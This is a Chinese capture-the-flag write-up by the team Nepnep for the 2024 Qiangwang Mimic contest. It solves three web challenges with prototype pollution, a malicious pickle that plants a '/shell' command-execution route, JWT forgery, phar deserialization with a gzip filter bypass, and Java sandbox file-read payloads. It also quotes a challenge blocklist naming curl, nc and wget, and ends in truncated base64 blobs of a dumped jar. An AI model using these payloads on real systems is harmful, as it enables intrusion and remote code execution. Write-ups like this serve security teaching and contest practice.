2024 强网拟态 – Nepnep -WP
队伍名称:Nepnep
最终排名:1st🏆
感谢队里师傅们的辛苦付出!如果有意加入我们团队的师傅,欢迎发送个人简介至:[email protected]
由于本文篇幅过长,如有需要 WP PDF 版本的师傅,请向后台发送“2024 强网拟态 WP”即可获取 WP。
Web:
ez_picker
/register 原型链污染
JSON { “username”: 1, “password”: 1, “__init__”: { “__globals__”: { “safe_modules”: [ “os”, “builtins” ], “safe_names”:[ “eval”, “popen” ], “secret_key”: 111 } } }
|
JSON import pickle class A(): def __reduce__(self): return (eval,(‘app.add_route(lambda request: __import__(“os”).popen(request.args.get(“cmd”)).read(),”/shell”, methods=[“GET”,”POST”])’,)) a = A() b = pickle.dumps(a) print(b) # 将字节流写入到文件 1.pkl 中 with open(‘1.pkl’, ‘wb’) as file: file.write(b)
|
JSON import time import jwt from key import secret_key data = {“user”: 1, “role”: “admin”} data[‘exp’] = int(time.time()) + 60 * 5 token = jwt.encode(data, str(secret_key), algorithm=’HS256′) print(token)
|
上传pkl文件写内存马
JSON import requests # 目标 URL url = ‘http://web-10c5ac0445.challenge.xctf.org.cn/upload’ # 文件路径 file_path = ‘1.pkl’ # 读取文件内容并发送请求 with open(file_path, ‘rb’) as file: files = {‘file’: (‘1.pkl’, file, ‘application/octet-stream’)} # 设置请求头 headers = { ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0’, ‘Accept’: ‘*/*’, ‘Origin’: ‘http://web-6f5b38ec4e.challenge.xctf.org.cn’, ‘Referer’: ‘http://web-6f5b38ec4e.challenge.xctf.org.cn/upload’, ‘Accept-Encoding’: ‘gzip, deflate, br’, ‘Accept-Language’: ‘zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6’, ‘Cookie’: ‘token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoxLCJyb2xlIjoiYWRtaW4iLCJleHAiOjE3MjkzMjE0ODN9.qe64g5NTlukRKtTs3aRzzl7P1zIkCUz6F7m-L58MphQ’, ‘Connection’: ‘close’ } # 发送 POST 请求 response = requests.post(url, headers=headers, files=files) # 打印响应内容 print(response.status_code) print(response.text)
|
/shell?cmd=cat /tr3e_fl4g_1s_h3re_lol
capoo
任意文件读取读源码 showpic.php
源码
JSON class CapooObj { public function __wakeup() { $action = $this->action; $action = str_replace(“””, “”, $action); $action = str_replace(“‘”, “”, $action); $banlist = “/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|~|`|r|n|t| |^|ls|.|tail|watch|wget|||;|:|(|)|{|}|*|?|[|]|@|\|=|<)/i”; if(preg_match($banlist, $action)){ die(“Not Allowed!”); } system($this->action); } } header(“Content-type:text/html;charset=utf-8”); if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’ && isset($_POST[‘capoo’])) { $file = $_POST[‘capoo’]; if (file_exists($file)) { $data = 9file_get_contents($file); $base64 = base64_encode($data); } else if (substr($file, 0, strlen(“http://”)) === “http://”) { $data = file_get_contents($_POST[‘capoo’] . “/capoo.gif”); if (strpos($data, “PILER”) !== false) { die(“Capoo piler not allowed!”); } file_put_contents(“capoo_img/capoo.gif”, $data); die(“Download Capoo OK”); } else { die(‘Capoo does not exist.’); } } else { die(‘No capoo provided.’); } ?> src=’data:image/gif;base64, ‘ />
|
远程写个phar文件,题目检测PILER字符串内容,用gzip压缩绕过
Phar文件
JSON highlight_file(__FILE__); class CapooObj { var $action=”; } @unlink(‘test.phar’); $phar=new Phar(‘test.phar’); //创建一个phar对象,文件名必须以phar为后缀 $phar->startBuffering(); $phar->setStub(“GIF89a“.””); $o=new CapooObj(); $o->action=’whoami’; $phar->setMetadata($o);//写入meta-data $phar->addFromString(“test.txt”,”m1xi@n”); //添加要压缩的文件 $phar->stopBuffering();
|
gzip压缩后改为gif,capoo=http://ip:port/#下载后phar://访问
虽然报错但可以执行,然后diff读文件拿flag
读 flag-33ac806f
OnlineRunner
题目想要在不 import 任何类的情况下完成攻击。这里应该有两个思路
1、直接不 import 打,尝试如下 payload 失败
JSON try { Process process = java.lang.Runtime.getRuntime().exec(“echo 123”); java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream())); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } process.waitFor(); } catch (Exception e) { e.printStackTrace(); }
|
主要是因为题目的 Main 类没有抛出异常。目前可以使用这个 Payload 任意文件读取
JSON try { java.io.FileReader fr = new java.io.FileReader(“/proc/1/cmdline”); java.io.BufferedReader br = new java.io.BufferedReader(fr); String line; while ((line = br.readLine()) != null) { System.out.println(line); } br.close(); } catch (java.io.IOException e) { e.printStackTrace(); }
|
JSON java–add-opens=java.base/java.lang=ALL-UNNAMED-javaagent:/home/ctf/sandbox/lib/sandbox-agent.jar-jar/app/app.jar–server.port=80
|
列目录
JSON java.io.File folder = new java.io.File(“/”); java.io.File[] listOfFiles = folder.listFiles(); if (listOfFiles != null) { for (java.io.File file : listOfFiles) { if (file.isFile()) { System.out.println(“File: ” + file.getName()); } else if (file.isDirectory()) { System.out.println(“Directory: ” + file.getName()); } } } else { System.out.println(“The directory does not exist or is not a directory.”); }
|
然而这里最终的目标还是 RCE,以当前的 payload 没有办法很好地拿到 app.jar 的内容,于是用这个 payload 来看看 jar 包中都有什么,一步步想办法去读题目的实例类
JSON try { java.util.zip.ZipInputStream zis = new java.util.zip.ZipInputStream(new java.io.FileInputStream(“/app/app.jar”)); java.util.zip.ZipEntry entry; while ((entry = zis.getNextEntry()) != null) { System.out.println(entry.getName()); zis.closeEntry(); } zis.close(); } catch (java.io.IOException e) { e.printStackTrace(); }
|
发现这里还有个 agent,直接 Runtime 打不行,大概率就是因为有这个 rasp,下载 agent
JSON try { java.io.File file = new java.io.File(“/home/ctf/sandbox/lib/sandbox-agent.jar”); // 需要读取的二进制文件 java.io.BufferedInputStream bis = new java.io.BufferedInputStream(new java.io.FileInputStream(file)); byte[] buffer = new byte[1024]; // 创建一个字节数组作为缓冲区 int bytesRead; while ((bytesRead = bis.read(buffer)) != -1) { // 循环读取 // 处理读取的数据(这里可以进行打印、处理等) //System.out.write(buffer, 0, bytesRead); System.out.print(‘”‘); System.out.print(java.util.Base64.getEncoder().encodeToString(buffer)); System.out.println(“”,”); } } catch ( java.io.IOException e) { e.printStackTrace(); }
|
JSON import base64 data = [“UEsDBAoAAAAAAAsdRlkAAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBAoAAAAIAAodRllB90L8xgAAAFMBAAAUAAAATUVUQS1JTkYvTUFOSUZFU1QuTUadj8FOwzAQRO+R8g/+gbVacUDKre0NEVSBxH0TT4ghXiN7E6V/j9sq4sKJ486M3uy0LH5AVnpHyj5KY/Z2V1eH1I9+QfqVzxPWOZvNqKtTAiscHS+NOXxzP8K0vEDq6jj7SW96uGTv7oKjJ/dV6I92Z/cPBC4lHxCl08Q5N6aPwfLkO+7Yfi7BZhbXxdXyNWRv0WeepdRcu1noFQ6DF9wBKAhNMzZPE0seYgp/2W9QemEtO6iFjtHRORXWumXKFdjLv16rqx9QSwMECgAAAAAACh1GWQAAAAAAAAAAAAAAAAQAAABjb20vUEsDBAoAAAAAAAodRlkAAAAAAAAAAAAAAAAMAAAAY29tL2FsaWJhYmEvUEsDBAoAAAAAAAodRlkAAAAAAAAAAAAAAAAQAAAAY29tL2FsaWJhYmEvanZtL1BLAwQKAAAAAAAKHUZZAAAAAAAAAAAAAAAAGAAAAGNvbS9hbGliYWJhL2p2bS9zYW5kYm94L1BLAwQKAAAAAAAKHUZZAAAAAAAAAAAAAAAAHgAAAGNvbS9hbGliYWJhL2p2bS9zYW5kYm94L2FnZW50L1BLAwQKAAAACAAKHUZZjfQUsW8FAADNCwAANgAAAGNvbS9hbGliYWJhL2p2bS9zYW5kYm94L2FnZW50L1NhbmRib3hDbGFzc0xvYWRlci5jbGFzc5VWXVcTVxTdF0IGwigaCBRBSykgCWisrVYBrRWhYgNaoliktr0kAwxMZtKZCWq/1+qfaH9AV19xrVZau+xjH/pv+u5qu+9kEgKEpX3IzM255+x9Pu+dv/55+geAS/hWQ4OAvi43Zdo2/PSd+UycGxEdTYgKdBXkhjHp2Dnp3zX9Na48X9q+JzA0nAmMLGmvprO+a9qr48n9ohgEmnW0ICYQnTBt078skKhnuxCDjkMaDivtNlLX+jRpSc/LODJvuALx4aVM7SZtm3FUIJmVdn7ZeVijvGTLguEVZc64NOiNF6W/pt73NbQLHNnx4ebyupHzY0igU0OXjlfQvWu/7CMjWHHcgvQFLtaJYCmzF7BeQlrQg14Nx3WcwKsCZ3JOIS0tc1kuy/T6ZiHtlWNIy1XD9tP7I2I6fafiT7xewnvwmo5+vM6yrph2ft7wnJKbMwT6Dy5ZJZOqBoM6hpR166rhV4wV6rCOJFICh2pR2QkjB8OWfNNKT9mlguFK33TsAH9UxymFo9fge4ogreMM3hBoUwRBtPkgcIHBFzRboBaE/g==”, “po63FEaLwgjESnpex9u4QEqXfNamEcJ2DO/DSC5oGBNo35FPPcwZReW88n1C58ywg1ssuhei1JuEe/u9a8UVvKvhqo5JXBM4GuybDncdz5DLFgvUlFNrgcZh5cb0Ljdur7nOg7LayTqE9QZKIDLp5GnQljFtY65UWDbc22WIeMbJSWtBuqb6Hwoj/prJeM5m/m9PjjMh1UET6Az1Jx3XuCHdadMybnHyBGLVXHoaPhA4Ue29WWmp0TLybMKqEj1SqMxHybUEDu9uVTZi1pe5jVlZrPhPNfrfdUDv0bHdUT8qViI/Wd9kYjfj5XENSzy96upquF+pF4s6c7MmipasuWpLv+SSafzlh2UfO88fGfbc0X3tJSAIn8jUaVzuaWHjU+seJ9uqHa6OvVgTKRWpyb7Zs6FhQ6Bvj3DO8aedkp2vCTj5UhOhaNQM1jkkSR2MwszKLcfzzKBGsWxwUqhuYo33N+FphcJT+6rj+J7vyuKs4a85ea8tCp4BPkoaNtWt9kBgYIfQtDedDSPkLV900zLnO+4jge9rwwgVy6DXyW4Z3kDGcTZKxTrDd5Ch6rk66i+4OkKISWlZWdM3xpvxSN1FzMSY4KE2Y9uGG2TCYIm+5HH5Um5r+LoyggeqkqasjD4eozq/DHh2qJuLqyh/LXgPDbjOlQ8NjXyfTkWeQSw2/s7H6FMl2oaW3UZrKn6k6Rnii40j2cXIaPZXdPyCY49p0YAZPg8H1h28ehO8Hjpxg//6yoh4HxkgWM2SWQSrOa4acFN9q1Byiz9eWnwqXz7jjrJMpEaeoG9WjP6IptGt1Mg2BmZHt7jRGFB2shuAYwykB63oxSEG1k7YHepElTqB+YA6ijZkcZsEdyhthniuvlk4VupOo42i/66W/mQt/UiZPlJDP0DIQdIPkX6Y9MkX0i/gLgk+pFSvShb3OHSvmpmP8HGQ40/IxKsrdPFvvhV7Url4eu7Un2g6taXWZ8civT+gJdUdeYJz3ZGtsUhqpHcb41uE0ulCHy6G7g+x+KoQUaQR48WtLt52nEMXzuM4LgSa/RgLwrlMrXYG+CkkrfvZKsvIcUUHqiEmwxDVKg+DLkdZ0BVaNAbBdlJSxlilZXlvlXsq7H40PoeuYe05jvD5L1UjGno0JAT/go+L1YSshwmxuD6BQtgy6aCGQFPqZxzbqnZlNBBeCYLQywqhwwI2roXGC3w38N2a+g3vCPyESOZxoBxljqbCbosH8c5TdofSLHO2UAPbGsKqaPhJPqPRjoZO4EmRHR3UFi5/D/E5/6kP6y/wFb5B939QSwMECgAAAAgACh1GWZNuBnUfFgAAyS8AADEAAABjb20vYWxpYmFiYS9qdm0vc2FuZA==”, “Ym94L2FnZW50L0FnZW50TGF1bmNoZXIuY2xhc3OtWgl8VNXVP2cykzeZvJAwASQgEpA1q4KghEWSkJBANjMBDKDxkbwkA5OZdGYCpLZudana2iq2Fdxaa0sX2yK0Q4AK2r22drG2dret3fddbal8/3Pfm5mXZNj69Se+9+69557tnvVOnn396HEiWumaoJGLqbQ7MlBphILbjG1G5fadA5UxI9yzLbK70ugzw/HKank2GUPh7n4z6iM3eTTK1kkjL1PBdmOnURkywn2Vrdu2m91xpuwVwXAwvoopa8HCjTnko1yNdJ3yaAKTrsCDkcr6YMhkyouZg0bUiEeitf1GlIlr/WCrQKeJ5Ge6YMDYYdZGwt1GfFMw3o+vWNwIx2NM8xc0pekG4tFguG957cLxc34Ch8LCZJ2m0AVMOSmCTP5M8C4qEurTmJZlojF+KiPVLCrygfQMnS6imUwT+8x4wFJpbW9fmxHvZ5qXAX1GXG6aJRzNZroiw5ZzROKhAi/NZfKoE80Bb/N1WiAayW2q3tBS29DV3LqmTngu0amUynBS8Ui9acSHomazMch08enZHYoHQ5UAWi7bK3SqpEuYtKAcVijEFFgwBsyBSICiQwNiZI2pTyMejISTyMOmLEF9ke4dZry6pydqxmLLvbQIdmbE40Z3v1C9TKcltBRMQ9EtxoAZGzS6zTTTKdIZdCPbr9BpmWz3YntHZIcZlsnlOq2glTi8XdFg3KxWtNrN2FAIJl57TidxJgnEM5iu1Gm1HEJBe11gQ1NHV31jU11XW3VHgw82WyMuVss0OZPqNwpEnU71tBaaMHcHY+IX8LjNstCo0zq1EIyJo8lUk07NMuXtNsKbRCKNWpmmpTG3D4XjwQGzbne3OSgn4Kdsukosr51pts2C7biZ9dhCNRptgF85QRUpBI0O2iTiXI3lMbg2L9zopc04u7mx5cl/Ph9tpWs0ulanLrouyWZGTcKCcWoNkZg6eKZJCzIyt5W26dRNPbBMgLdFonGlrUYf9VKfRv06BWk7Dju9tTEcN/tMxAltpxEaMlt7maYsaHQityGAPUQDGoV1itDgqJBokcc59EaiA0Y8c1DZ4piyYmhm/XZQVKcYSYQ1BgfNMGQpcaKTEBow3zBkhrtTJwQlWyeg9u/UaZcEbU9vaCjWLzPDOr1RzXSHIjGYxJuYCtMYO/qjkV3GNjGg6+kGnW6kmxCzjZ6ewNDgoCjfBA9TnTykdsBCNboliQ1sNLamLEtM5VaxhpvEB27X6Q56K8zcTjq1ISMWa4oYPWZURZ78MT6cS3fR3Rq9Tae30z1gZ9QqrKE7ghCCwLLeHB7jO0nlbhYU79TpXroPRgBzGBONMxyCPQ==”, “pdH9TJecOVsGxonhoz30bpH3PZkzVyb3Fhb36rSPHgSLg0PxMdHf5uecmPbSw0yLwXSFzXQFmK6wma7ojkTNipgZ3WlGK9qikd3DtZgIqLHw/ahO76X3IXGGIIqSiWnuWVKXAgPZ98N3ekyE9ciwRh/ASY4B8dHjtF+nD9GHgR/H0GzG+yOwqNVncRILv5Ni1OwNQdRKCwNIf9QKC42qYuiG/X6MPq7RJ3Q6QE/CZE+3UyJmeCcywBhPtTV5Fk+1p0Rth3T6pPhVvvKrxt62SCwWhFvIsSZ0OiyWlx01ByI7Tck1R3Q6KglossSmaGTQjMaDpgrdUiwIxKd1ekog8lNp2VKMrJ3Q6WlZm5AuMxoiA/DmzwBj2j22G9HKdUbUSghMn9Pp81KcTErvCgwOA8Ai+Qx9UUz2S4iJY4M/jPNZ+opGX9XpOfoa05xzSehIIlbU6ojURCJxrBmDDh8JmEa0G2XRNGfKdnCsMh7TN3T6pjA92VFRwV5TXDN9S6cX6NsoHsVgW6NrzN5g2HQQYlp53mWUYzts60XE3TN6k3CEYrU32Idj8tH36FGNvp88irEIvfRD2Go8ktrgpR+rxF0TDPdo9JNROQmaC5kGAuhL9DOdXpZ8rm+z5jZKkvLSL5jc27DTS7+y6pmmSLcR8tJvkL1sJoutuqm414BeeyokGv9Ojvr3Y/LJeNU4o7skvT/q9CdJqdkhM9wX7/fSX5BJrt0aK5kjq3/T6e/0D8QAZD50DrHTVDKb5dRe0elVgS0Ixloi8RoA7LDWNfoXzjJtEk3B8A6zp8GI9SPa++g18sj2/+j0umzPg9rSe+F/+E/SM7t0zmI3uIsNhoLxzGF44Zbxc17OBoqVcFv26pwjCteCsbqBwfgw6HKuzrpU5gVQNCzNQHFobURi4wk650tx52oNeHkiwviuYFh4KdR5Ek+WSszOVEzTT5/HN3sZONz9cGhBWqTzNEE6aU1dfbWUjIHqljU1rVd3NbQ2S/3OF+o8gy9i8qVZYlp7hhr8fBoJIVCs8yzRQ04wtgmGFtkV8/LFUhtdGVx47ZbKrVuvWbDFKH/jNQvVt4/n8jyN5+u8gBeOOskoaqfdlXBbVCeIDhpcalA1heVnaTVGbVwuBEp1LuPylKXBxxefrTByYGq2NgFTJV+i8aU6LxL5xrHanETu7hUH48vwNefSqkrZt1TnyyUu6VFzMITeoz4YjcW9vAxqCif7ES8vVwlRnYmX0Vp44tJsePlKJiSLauAbRPAXJdfqvEbwTU3HuXRekFDn5Xr43dzYStTLPm7gRo3XoTrk9UnGHdqrGQqGVOQ7g2bHg8P2m5k6l3f39gmR2HAsbg50DUR6hkKmTOBLvQ==”, “7ajSJRYq4yEUEw4wSLQzCHTynVKF4hpiturcNiYHNaudIqKYe7vOATH3qUkz3xCoa5dedUOqUWLeoPNGwTJllLIUVZUVuIFqvNypun9V5wQHvbwFZ3FJhfpPcFyj87XcBU6sJFUfjQw429/W8ZpLqum/8ayNXjYQ9W12BtGNeLkbgeYSOUpT515perzxSDLHP879OgcZDUqhVSHEUWggqa6JDCCASH9mH2PM7B5CvT9cORYGRhLiAY3DOkcYAl10ZnCEUhCqxREHIkNR6aUvHEcivQrkUY5pHNd5iHcm66sMgFZVJinJKgkKFjja/A3tTUC0m4c1fqPO14sKdOei1brZ/Sy/Wecb+EaLzzYjijLDulJKoUyWKwJ8s863CL6cFLAfCW+Wj2/j2zW+Q+e38p2jGzdl7Tb2lONJs+OMH+kVOMvdQC+2XyGO4OO38z0av0Pndyr7zrTHUoY9HvaTl2ZpvAe9SBoYGQI6FH4ra1OfyeTH95HHy++GWiKxCnEtEeceyTB7dd4n4qKsaIrsMqO1Rgyamei46emqXlvX0gH5kpdqqnyQOzEnTEdHdW0DxAoE+8LKF5g2jDb3FRnM/Xzbo+WrEBcvqG2qDgS6Wuu7alvb6/BoqW9cu6G9DhVhaqWtvfXqTmsdUWBjXTsMpK65raOzK9DR3tiCmF2wvq5zVEaEhDLVUt1cF2irrsV4YjJxOuYUjIWyq7ENuTMJI4N8x2JbazuUpieXrWGOAHS0rq9rAabkkj2eKmvgu62uvaOxLpC+4EGsF7eQ9hb1acvQwDYz2iGllZyBlGwbjWhQxvakO94fhMWUn0W7o65ql0uISfcDMBQ07ZZ3Lz9zoXeme7mNkLLX2YKAOYGH4Z4bBmhMMWtx4ut1hNkpo0UfHkyKv+TsZjduRszK1bsL3jcqINj3IYi2wDs5teS4n8CaJySMIOqd6Q5PVQLC3YTREQcKCqDC3gFGbfZzu50NyKLzdxFVH6k+BxpLMRqTkBNO3bT6x9+gYFKRbu1Vvb3V10soGNtNp7SUnltRIhrkeEpLY3oAOO1peiQ4ok011dUASUS1xzLnaI9GX8PbHTTSXBJ4FNu8WW6qjCGJZv7BcX0y5BIl1Y82zuEF/5Xt/A9uqVGgxWwm8nqc3QEsZsfOgNkneKqjUWMYAmdoPjC7Y2ebEYzaoMnN/lGzCoHGP2JqPPsd/Tk7TtaA+GPWDrlE023m7Rwx8P9W6Pm0HDh15OGi01btabHPk5+MtHKSka0mRTNDycc0dK714P9SOYi83hXdIfvXNZ9VUllVj39U4K+QvXDC1EWLdbsVy8/mv/j4r/w3jf+u00T+x5i7G7n5sqlZP7vVG93xSBQm8MCCpg==”, “cYAW0gbEnJAZm9MUiewYOkv5O2qjRPcM4Ge5Y7NR1CLgBRDHUXe9gpjAjC7Fy69BQcxW7+HlfyOfMCPKsh0Xy9XtzHYj6uX/IB6NXosNDltLpxAKOTldkY4yXhdD6czJhsbrymIqVj8OFccjxVH101CxJITiqmJO3q54XR4cRApfuc2cS1OzqXsj1QjC0xrDYZRrEjvNmObyMc09J7VrLj1Z0p8WFNHIAqZZhMxFRJNpmlwm4GuadFnq/SDezA/h20VzMH7YMb6UfPKbocDJz1bqfQe9FeuPyDo/Cvj3OuC/g/H7HOOHMH4sPeZVGL/fMZ6C8eOO8RUYf8AxrsL4g47x1Rjvd4w3Y/whx/g6jD/sGG/D+COO8QqMPzqGnycc49UY59tysvzcjZWPYVQp10p4e0oOU9aTCvTjeGaryWn8CTx1C4APsKz75Gdge/NlUISs+UoOUs5Ryic6MAbDDAcGHx9UDPikT86MoXA8hlmZMMjFqY3hcspSa3mC4SBNOkpTxyOZ60CSl0Ly+TMgmT4eycJMSORqI4XEZSMZoQsVkuLxSMozItl4OoVcPB7DpRkUksOH+JM2hvXA4MI73z/nEM0DLwtLR6h8U/psJ0BYoq3koWvwfa1CN8Xawp9S6OQrwYdBIodHUojvgKPJzun+S23EzWUjtBj/X14mJEaoSohkKSKzYWFE/SAShKa3Uy7tgH2EaBINgMR2WGFEES62UKYIT7cJ+xDSj8AfXXzUllbN8DEwWiI/ZltM8V5oRQPE/cfI13mQVh2m6pbyBK3ZSzPxathLPrzW76OJx6ils/wotREdpsCJY9TRWe4+TBur3EVuf6f2FLk7s0oCne7SQKenLEFbAp3ZeBkjZAZGaEeC3rCpyJ2gIXns3k9FVR77S6/KLvIUZSfozUWeE/spv8othIqA+i0nnoRsy6iXwnQ9DdIQ7ca7gm6FIm+2tbSO5G9EboB2boTt3wSt3AyN3KKgltFt1ER3UoDuos10Ow7rNjLo7cB3DzDeiv/eCUz3AOIdtIf2KG2ugjaW0Xr+NEMgrPj4OJ9Q8fF+XmZr+H5eKXFBfT3Nz0CfuXQnf4Y/C54+h9m15D1JxRr58k7RlfLnMSH1bytmNOog1uj6U5RD2WMWMK3WvK+Rq0ajm3NxTC/Qt3GAYjsftW1n9UG6reQI3emivVTM1uAdLvoAFaa+n6Y9zftp6jHa01lSepje1SwrZUfogSzaVHYgZWDTICohDE+kh6mIHqGF9H5aTI9DBfuVKkpAcR5gP89fULa9OqWA1fxFpYDFcEC1qsTOIdfCkzRJgya/hKEbANfD5b9MtbYIX7FFaHZy2sSlHyT3k6X+hxL0SHOZ/7Gspw==”, “6PEEfbDM/xH7i/GGqTxhvzaVJuigheFTLlJe6VbyzAMHRAcpjw7BKD4JcxiBjEeolI5Cpqeoho7DHE44nKbZligPEj0LORjwi/kr/FWH01gzz9kyIuifpMLRIpbI37hYIrqegU7z4FST4dyLm/EYacHjWJUbz+NVntJj9Eyn+FmRZ4Q+C087TF84Ql92UZlMfH2EnoczZPu/k6DvVmlFmv8HHqigM8sfgl/hIcrwKEcrcmOmHBNPVHmx4SHZkFOUM05nVT5M/sieLPLZs0/TSwn66dLcybn7qAEAP7fIFGlC5tmAArXpeJVHi9r304wqHcCPjcW2qUg/gflfjqey9UCVR5zZ/+siz2H67QmY0UfoeZj09Sh3ssXW7aO7RQI97MNDX0WUeo4K6BsIqM+jNvkW1Ps8FPxdWkTfpyV4V9FLsKifwYtfRkT8JcXpN/Qm+i28+Xfw1z/CE/4KKn+nT9M/6Gv0T+z+Fyi+Qi/Sq/R7eo3+RKfoFfVbEHM2nWKN3ZzDHmUW9yCcv0hT+Wv8dZK/EfsLXwAD8YDmczCQb+Bwa+lz/E0YiAbaD/Hz/C2YRBzmIEaTA/o38AuY84GLbfRj/jblcg7p/B3g84hZqIhM6suK0h4uUEboQqTJ5RfxlQXdePi7+HIrIxRTtag+B6oWrefE1AUbojkpw2ygrFMQU9foLo2eTUYW69/3NHpcI7f1ZBVjik6JXGOA1YpdvX0PMrwKDVqJa6udU6dzCUqwkgT94REqKPH/OUF/3Ueaez+5s55IxRX5IzXiYsrmWciCs1EDFTsS7nT+vvicYtpDrqLVkpdeT1GqsaspKQH+OR63SuA8b1QJMApfruCTn+FsfJsB5Eri20taCfCVHhjDawlpXIqjKsNRlTiyuY1bff1AlYJCRRMqoi6f/G2c5fh8FRBJvr7xGL3WeZj+3QR6J/eSp/RAif9Ugrm57Pg+GZW1lB9f6s5a6pnsmex+jK4qn+xZJD6voLP3U1VRdiF7sEH8/7jnvbSwSMtahNV9NLNIcy9KwvlLZV5mrLh+q4f3n/q4ksxyqXrEdeJL0AItxilchtR/BQx7GerJKpqJBLYEBe5KvhKRr5rWcQ1t4FrqQi1mch3181raBZg38zqljcug2XUovH7IP4L0S6iGfwxtSPa40S47vIAX02bUjn38EuDSEVStwVAt7S0g7SRNhOWdpDyNf/I6efFkRNULoNKTNB+j12jCq3AMyxB/iuOcwRfZKeQunItE7lliiDNKjsB7aR9NKim100mobIR9OOKytCKsI26lCerHpauQNFscKWAW/8zySHy9bGf1Wfxz8ciUAAoq5Wk4/ply/DZ/vwB/s5DyLXObrewGZeVBzg==”, “K+SCBPvFdtlhu5tgNk/TUlueR8GEsFFeUshTDvLUEZ7eNMIz99KMQp49wnNKE1zSXJbgir2UW1bIixO8pMlxyCqF81aY7jU44GvpQu6ii9HplHJ3SsYLcfy/5F8pxsrt+JNLs1VkY4eM5Y5ootJcaVrIX4PpJSmm19q1fi6YvqKQq8B02qMsKfsdHpprEXWQyrVJpZEvy4h8RSGvyoB84DyRH00hD9jI84F8taTkEa4ZRUBV9hyF9Q0BUdRBKH8cofyxhOQ3Q5vQfVChFI3zS8vsWm0mSNZZSbVMcmpZOQirypjXOooYi4EbgOxGmsc3pwoxoOLf8G+Vcc23XU2+Xla5Q77EZrMc7M13OF2WxEyLz99BIU+lFPICzFns7zpRRtMxbugs5KYCq5hHR3KhcDrCLSjpD9I8VPQo7rWDfFWg04vpjkBnQbYUOiLGYd7UXAYZry7kzSO8VT6vK+Rt8pngnrSGS0Cf+DZo+HaaxHciH9xNi/hequI9tIrvoDp+gNr4QdrCDzvc9DrbcD2YP6jctA47RSFON71uzIl4+fepNv1uhYdok5RffmTfvgRD929I8C7UYQl+U4JvOsRT4YPSePJbiA7xVSN8ayHfleC3qbl7MUerjvF9nYf5/kN0WyG/a4Tfk+AHDnHekyk3t/q2pbDVy2kyIejCuC+i5cgUjbSamhFsO6CKPygW/8h/wvsKNIl/xu5/quer6vkv9Typnq/LEwlYni71dKtntkso+fCV48p15VHR/wFQSwECFAMKAAAAAAALHUZZAAAAAAAAAAAAAAAACQAAAAAAAAAAABAA7UEAAAAATUVUQS1JTkYvUEsBAhQDCgAAAAgACh1GWUH3QvzGAAAAUwEAABQAAAAAAAAAAAAAAKSBJwAAAE1FVEEtSU5GL01BTklGRVNULk1GUEsBAhQDCgAAAAAACh1GWQAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAP1BHwEAAGNvbS9QSwECFAMKAAAAAAAKHUZZAAAAAAAAAAAAAAAADAAAAAAAAAAAABAA/UFBAQAAY29tL2FsaWJhYmEvUEsBAhQDCgAAAAAACh1GWQAAAAAAAAAAAAAAABAAAAAAAAAAAAAQAP1BawEAAGNvbS9hbGliYWJhL2p2bS9QSwECFAMKAAAAAAAKHUZZAAAAAAAAAAAAAAAAGAAAAAAAAAAAABAA/UGZAQAAY29tL2FsaWJhYmEvanZtL3NhbmRib3gvUEsBAhQDCgAAAAAACh1GWQAAAAAAAAAAAAAAAB4AAAAAAAAAAAAQAP1BzwEAAGNvbS9hbGliYWJhL2p2bS9zYW5kYm94L2FnZW50L1BLAQIUAwoAAAAIAAodRg==”, “WY30FLFvBQAAzQsAADYAAAAAAAAAAAAAALSBCwIAAGNvbS9hbGliYWJhL2p2bS9zYW5kYm94L2FnZW50L1NhbmRib3hDbGFzc0xvYWRlci5jbGFzc1BLAQIUAwoAAAAIAAodRlmTbgZ1HxYAAMkvAAAxAAAAAAAAAAAAAAC0gc4HAABjb20vYWxpYmFiYS9qdm0vc2FuZGJveC9hZ2VudC9BZ2VudExhdW5jaGVyLmNsYXNzUEsFBgAAAAAJAAkAeAIAADweAAAAAFChFI3zS8vsWm0mSNZZSbVMcmpZOQirypjXOooYi4EbgOxGmsc3pwoxoOLf8G+Vcc23XU2+Xla5Q77EZrMc7M13OF2WxEyLz99BIU+lFPICzFns7zpRRtMxbugs5KYCq5hHR3KhcDrCLSjpD9I8VPQo7rWDfFWg04vpjkBnQbYUOiLGYd7UXAYZry7kzSO8VT6vK+Rt8pngnrSGS0Cf+DZo+HaaxHciH9xNi/hequI9tIrvoDp+gNr4QdrCDzvc9DrbcD2YP6jctA47RSFON71uzIl4+fepNv1uhYdok5RffmTfvgRD929I8C7UYQl+U4JvOsRT4YPSePJbiA7xVSN8ayHfleC3qbl7MUerjvF9nYf5/kN0WyG/a4Tfk+AHDnHekyk3t/q2pbDVy2kyIejCuC+i5cgUjbSamhFsO6CKPygW/8h/wvsKNIl/xu5/quer6vkv9Typnq/LEwlYni71dKtntkso+fCV48p15VHR/wFQSwECFAMKAAAAAAALHUZZAAAAAAAAAAAAAAAACQAAAAAAAAAAABAA7UEAAAAATUVUQS1JTkYvUEsBAhQDCgAAAAgACh1GWUH3QvzGAAAAUwEAABQAAAAAAAAAAAAAAKSBJwAAAE1FVEEtSU5GL01BTklGRVNULk1GUEsBAhQDCgAAAAAACh1GWQAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAP1BHwEAAGNvbS9QSwECFAMKAAAAAAAKHUZZAAAAAAAAAAAAAAAADAAAAAAAAAAAABAA/UFBAQAAY29tL2FsaWJhYmEvUEsBAhQDCgAAAAAACh1GWQAAAAAAAAAAAAAAABAAAAAAAAAAAAAQAP1BawEAAGNvbS9hbGliYWJhL2p2bS9QSwECFAMKAAAAAAAKHUZZAAAAAAAAAAAAAAAAGAAAAAAAAAAAABAA/UGZAQAAY29tL2FsaWJhYmEvanZtL3NhbmRib3gvUEsBAhQDCgAAAAAACh1GWQAAAAAAAAAAAAAAAB4AAAAAAAAAAAAQAP1BzwEAAGNvbS9hbGliYWJhL2p2bS9zYW5kYm94L2FnZW50L1BLAQIUAwoAAAAIAAodRg==”] with 